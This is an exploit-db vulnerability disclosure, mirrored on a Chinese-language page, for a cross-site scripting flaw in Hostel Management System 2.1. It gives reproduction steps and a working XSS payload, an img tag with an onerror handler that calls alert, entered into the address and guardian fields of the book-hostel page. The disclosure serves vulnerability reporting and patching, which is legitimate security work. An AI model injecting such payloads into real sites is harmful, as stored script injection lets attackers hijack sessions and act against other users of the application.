Hostel Management System 2.1 – Cross Site Scripting (XSS)

  • 作者: Chinmay Divekar
    日期: 2022-01-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50628/
  • # Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS)
    # Date: 26/12/2021
    # Exploit Author: Chinmay Vishwas Divekar
    # Vendor Homepage: https://phpgurukul.com/hostel-management-system/
    # Software Link: https://phpgurukul.com/hostel-management-system/
    # Version: V 2.1
    # Tested on: PopOS_20.10
    
    *Steps to reproduce*
    
    1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php
    2) Enter xss payload<img src=x onerror=alert(String.fromCharCode(88,83,83));> on various input fields.
    3) Server Accepted our Payload in input fileds.
    
    Affected input fields: Correspondence Address, Guardian Relation, Permanent Address